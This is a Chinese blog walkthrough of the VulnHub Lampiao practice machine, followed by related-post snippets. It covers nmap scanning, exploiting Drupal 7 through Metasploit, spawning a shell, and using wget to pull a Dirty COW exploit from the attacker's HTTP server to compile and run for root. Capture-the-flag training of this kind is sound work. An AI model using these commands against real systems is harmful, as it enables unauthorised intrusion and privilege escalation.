lampiao打靶思路详解(vulnhub)

于 2024-03-12 20:03:14 发布
阅读量400 收藏 8
点赞数 7
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MCcming/article/details/136661673
版权

lampiao打靶思路详解(vulnhub)

第一步:信息收集

nmap -sn 192.168.31.0/24

在这里插入图片描述

确定靶机IP为192.168.31.116

再次使用nmap对靶机IP进行详细扫描

nmap -p- -sV -sT -O 192.168.31.116

结果如下

在这里插入图片描述

第二步:WEB渗透

访问http://192.168.31.116/

在这里插入图片描述

发现什么都没有

然后访问http://192.168.31.116:1898

在这里插入图片描述

通过插件可以发现是 Drupal CMS 版本为 7.x

搜索

searchsploit drupal |grep 7.

在这里插入图片描述

我的天哪!这个CMS爆出过不少漏洞(手动狗头)

那就启动msf,因为msf里面集成了很多漏洞

msfconsole  

search drupal

在这里插入图片描述

然后就是挨个尝试了

在我使用到第二个的时候,成功了

use 1

show options

set RHOSTS 192.168.31.116

set RPORT 1898

run

在这里插入图片描述

第三步:后渗透

直接通过msf进行后渗透

进入交互环境

shell

然后用python增强交互环境

python -c "import pty;pty.spawn('/bin/bash')"

查看用户

id

查看环境,看看能不能用脏牛进行提权

uname -a

g++ -v

在这里插入图片描述

感觉差不多,那就上脏牛!!!

本机启动python http服务

python -m http.server 8000

在这里插入图片描述

下载playload

wget http://192.168.31.178:8000/dcow.cpp

wget http://192.168.31.178:8000/makefile

然后编译,执行

make

./dcow

在这里插入图片描述

成功!!!

之后就简单了

进入root目录。获得flag

在这里插入图片描述

至此完结,撒花。

MCcming
关注
  • 7
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
VulnHub--Lampiao-linux脏牛漏洞提权
记录笔记
07-06 1046
vulnhub-靶场--lampiao
VulnHub-Lampiao-Walkthrough渗透学习
qq_34801745的博客
12-27 2329
VulnHub-Lampiao-Walkthrough 靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 靶机难度:简单 靶机发布日期:2018年7月28日 靶机描述:Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lam...
【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)
人间体佐菲的博客
08-30 1742
【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)
VulnHub-Lampiao-靶机渗透学习
嗯嗯呐的博客
11-04 720
靶机地址:https://www.vulnhub.com/entry/lampi 目标:得到root权限&找到flag.txt 作者:嗯嗯呐 一、 信息采集 开始我们的操作。 使用nmap扫描,确认靶机IP地址 扫描靶机端口,看看主机上有那个服务 字典生成工具 cewl cewl是一个ruby开发的应用程序,你可以给它的爬虫指定url的指定深度还可以添加额外的外部连接,接下来cewl会给你返回一个字典文件。 默认方法: 输入下列命令之后,爬虫会根据指定的url和深度进行爬取,然后打印可用于密码破
vulhub靶机--lampiao
m0_58595840的博客
02-02 480
vulnhub渗透,脏牛提权
打靶练习vulnhub: stapler
03-28
打靶练习vulnhub: stapler
打靶练习vulnhub: haclabs
03-20
打靶练习vulnhub: haclabs
打靶练习vulnhub:Insanity-Hosting
03-19
打靶练习vulnhub:Insanity-Hosting
打靶练习vulnhub: my-cmsms
最新发布
04-10
打靶练习vulnhub: my-cmsms
C语言——飞机打靶游戏
04-15
本代码用C语言撰写,可以使用dev C++等编译器运行。可以使用键盘'a'、's'、'd'、'w' 键进行上下左右移动飞机模型,按空格键发射子弹,击中靶子,系统会自动重新生成靶子,按'q'键结束游戏,显示击中靶子次数。
vulnhub-lampiao-linux-脏牛提权
MIs_Jiangyaomin的博客
05-31 115
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil //g++编译文件。利用生成的密码返回虚拟机终端进行登陆,一开始想直接在webshell中 su root可是被deny了,就只能返回虚拟机登陆。发现2017中的Drupal 漏洞没有修复,可以在kali上msf,进行利用msfconsole。user:root //账号。whoami //查看当前用户。./dcow //运行文件。ls // 查看文件。
Vulnhublampiao渗透测试
Bird&Bird
04-02 834
目录1、靶场概述2、信息收集1、靶场概述DescriptionBack to the TopWould you like to keep hacking in your own lab?Try this brand new vulnerable machine! "Lampião 1".Get root!Level: Easy链接:[靶场下载地址](https://www.vulnhub.com/entry/lampiao-1,249/)Kali IP 地址: 192.168.29.131靶场IP地址: 1
Kali Vulnhub-lampiao脏牛提权(dirtyCow)漏洞复现
牛奶栗的小博客
09-27 4312
vulnhub和vulhub不同,无需安装环境。 lampiao下载地址:https://www.vulnhub.com/entry/lampiao-1,249。 下载完成正常解压后,vmware打开ovf格式文件,创建lampiao虚拟机文件即可,设置网络为NAT模式...
vulnhub lampiao靶机 Linux脏牛提权
weixin_51441054的博客
04-04 3279
首先我们打开靶机,发现需要登录 利用kali作为攻击机,先扫描其ip地址,kali ip为192.168.142.134,因为在同一局域网下,用nmap扫描 得到靶机ip为192.168.142.136,访问80端口 再进一步扫描端口 得到一个1898端口,貌似是主页 发现cms信息 利用msf进行漏洞利用 攻击成功,得到一个普通用户权限 上传一个探测Linux提权漏洞的探针 发现没有Perl,不能运行,换一个探针...
渗透测试实战Vulnhub-Lampiao
weixin_44558065的博客
06-22 1602
目录 一、设计概述 1.1、渗透测试的意义 1.2、渗透测试的目的 二、需求分析 2.1、用户需求分析 2.2、渗透测试 三、方案规划与实施 3.1、信息收集 3.1.1 Nmap扫描 3.1.2 wpscan扫描 3.1.4 webdirscan目录扫描 3.2 漏洞分析 3.2.1 漏洞名称 3.2.2 漏洞概述 3.2.3 漏洞点 3.2.4 漏洞触发流程 3.2.5 漏洞利用 3.2.6 修复意见 3.3 web渗透 一、设计概述 1.1、渗透测试的意义 信息安全等级保护的要求 2015年12月2
Lampiao(dirtycow)脏牛漏洞复现
weixin_34075268的博客
06-13 711
nmap扫描内网80端口发现目标主机 nmap -sP -p 80 192.168.31.0/24 扫描发现目标主机开放22端口、并且 1898端口开放http服务 御剑扫描目录并访问之后发现存在目录遍历漏洞 且部分文件可以下载 下载后浏览发现cms版本 寻找i相关漏洞...
vulnhub--lampiao(脏牛提权)
鲨鱼辣椒的博客
08-03 4483
信息搜集 扫描网段确具体IP地址 扫描IP地址确定开放端口以及服务 浏览器查看网站 查看1898端口,发现另一个网站 扫描网站
vulnhub靶场之lampiao
向阳-Y.的博客
02-28 4277
目录1.信息收集2.尝试爆破ssh登录【失败】3.尝试访问网站3.1扫描目录【失败】4.网站系统漏洞【get】5.提权阶段 1.信息收集 首先查看本机网卡网段并来一波存活主机探查,经过排除,锁定了192.168.86.132为靶机 nmap -sP 192.168.86.0/24 接着再对靶机进行一波端口扫描,扫描后的结果如下 nmap -sN -sV -p 1-65535 192.168.86.132 2.尝试爆破ssh登录【失败】 首先使用msfconsole进行ssh登录爆破一波 msfcon
VulnHub靶场之Lampiao
A_dmin的博客
10-16 1484
VulnHub靶场之Lampiao 最近事情有点多,但是还是要抽出点时间来学习的!!! 老样子,Lampiao虚拟机先启动,然后再启动kali!! Lampiao虚拟机启动如下,不知账户密码,估摸着和上次那个靶机是差不多的!!!..
lampiao靶机安装
07-27
为了安装Lampiao靶机,您可以按照以下步骤进行操作: 1. 首先,您需要准备一个基于Linux的操作系统,比如Ubuntu或者Kali Linux。 2. 在您选择的操作系统上安装Apache服务器、MySQL数据库和PHP解释器,这就是所谓的LAMP堆栈。 - 对于Ubuntu,您可以使用以下命令安装LAMP堆栈: ``` sudo apt update sudo apt install apache2 mysql-server php libapache2-mod-php php-mysql ``` - 对于Kali Linux,您可以使用以下命令安装LAMP堆栈: ``` sudo apt update sudo apt install apache2 mariadb-server php libapache2-mod-php php-mysql ``` 3. 安装完成后,您需要下载Lampiao靶机的源代码。您可以在Lampiao的GitHub存储库上找到源代码:https://github.com/felipefacundes/lampiao 4. 解压下载的源代码包,并将其复制到Apache服务器的网页根目录下,默认情况下是`/var/www/html/`。 5. 接下来,您需要创建一个MySQL数据库并导入Lampiao的数据。进入MySQL命令行界面并执行以下命令: - 创建数据库: ``` CREATE DATABASE lampiao; ``` - 导入数据: ``` USE lampiao; SOURCE /path/to/lampiao.sql; ``` 将`/path/to/lampiao.sql`替换为实际的lampiao.sql文件路径。 6. 配置Lampiao的数据库连接。编辑Lampiao源代码中的`config.php`文件,并根据您的MySQL配置进行相应的更改。 7. 最后,启动Apache服务器并访问Lampiao靶机。在浏览器中输入服务器的IP地址或域名,您应该能够看到Lampiao的登录页面。 请注意,Lampiao是一个漏洞靶场,仅供学习和研究目的使用。在安装和使用Lampiao时,请确保您遵守当地法律和道德准则。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值